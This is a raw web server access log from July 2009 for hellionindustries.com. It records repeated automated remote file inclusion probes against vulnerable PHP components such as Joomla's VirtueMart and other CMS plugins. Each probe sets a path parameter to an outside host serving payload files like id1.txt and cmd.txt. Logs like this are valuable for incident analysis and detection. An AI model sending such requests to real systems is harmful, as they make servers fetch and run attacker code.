203.237.238.234 - - [04/Jul/2009:11:42:49 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:42:49 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:44:20 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:44:57 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:44:59 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:46:26 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:46:26 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:46:26 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:46:27 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:46:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:46:27 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:11:46:48 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
94.23.2.21 - - [04/Jul/2009:11:48:03 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "hellionindustries.com"
94.23.2.21 - - [04/Jul/2009:11:48:03 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:11:49:10 -0700] "GET //administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:11:49:10 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:11:49:10 -0700] "GET /logs///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:49:36 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:49:36 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:49:37 -0700] "GET /logs/access.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:49:46 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:49:46 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:49:47 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:49:54 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:49:54 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:49:55 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:50:09 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:50:09 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:50:09 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:50:25 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:50:25 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:50:26 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:11:53:45 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:11:53:45 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:11:53:45 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:58:57 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:58:57 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:58:57 -0700] "GET /logs/access_090212.log//admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:58:58 -0700] "GET /logs/access_090521.log//admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
94.23.2.21 - - [04/Jul/2009:11:59:06 -0700] "GET /zero_vote/error.php?dir=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "hellionindustries.com"
94.23.2.21 - - [04/Jul/2009:11:59:06 -0700] "GET /logs//zero_vote/error.php?dir=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "hellionindustries.com"
94.23.2.21 - - [04/Jul/2009:11:59:16 -0700] "GET /zero_vote/error.php?dir=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.hellionindustries.com"
94.23.2.21 - - [04/Jul/2009:11:59:16 -0700] "GET /logs//zero_vote/error.php?dir=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:59:36 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:59:36 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:59:37 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:12:00:19 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:12:00:19 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:12:00:20 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:00:25 -0700] "GET //administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:00:26 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:00:26 -0700] "GET /logs///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:00:32 -0700] "GET //administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:00:32 -0700] "GET /logs///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:00:32 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:01:29 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:01:29 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:01:29 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:01:33 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:01:33 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:01:33 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:02:37 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:02:38 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:12:05:19 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:12:05:19 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:12:05:19 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:12:08:27 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:12:08:27 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:12:08:27 -0700] "GET /logs/access_090212.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:12:08:28 -0700] "GET /logs/access_090521.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:12:13 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:12:13 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:12:13 -0700] "GET /logs/access.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:12:14:56 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:17:48 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:17:48 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:17:48 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:12:18:00 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:12:18:00 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:12:18:00 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:18:53 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:18:53 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:18:53 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:12:18:54 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:12:18:54 -0700] "GET /logs/access.log%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:12:18:54 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:12:18:54 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:12:18:54 -0700] "GET /logs/access.log%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:12:18:54 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:19:53 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:12:20:07 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:12:20:40 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:12:20:40 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:12:20:40 -0700] "GET /logs/access.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:12:20:40 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:12:20:41 -0700] "GET /logs/access.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:12:20:41 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:23:51 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:23:51 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:23:52 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:26:25 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:26:28 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:26:28 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:29:44 -0700] "GET /?sourcedir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:29:44 -0700] "GET /logs//?sourcedir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:29:44 -0700] "GET /logs/access.log%20%20//?sourcedir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:30:52 -0700] "GET /?sourcedir=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:30:52 -0700] "GET /logs/access.log%20%20//?sourcedir=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:30:52 -0700] "GET /logs//?sourcedir=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:12:36:06 -0700] "GET /logs/access.log/rgboard//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:12:36:06 -0700] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:12:36:06 -0700] "GET /rgboard//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
92.50.143.90 - - [04/Jul/2009:12:37:12 -0700] "GET /logs/access_090212.log//?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
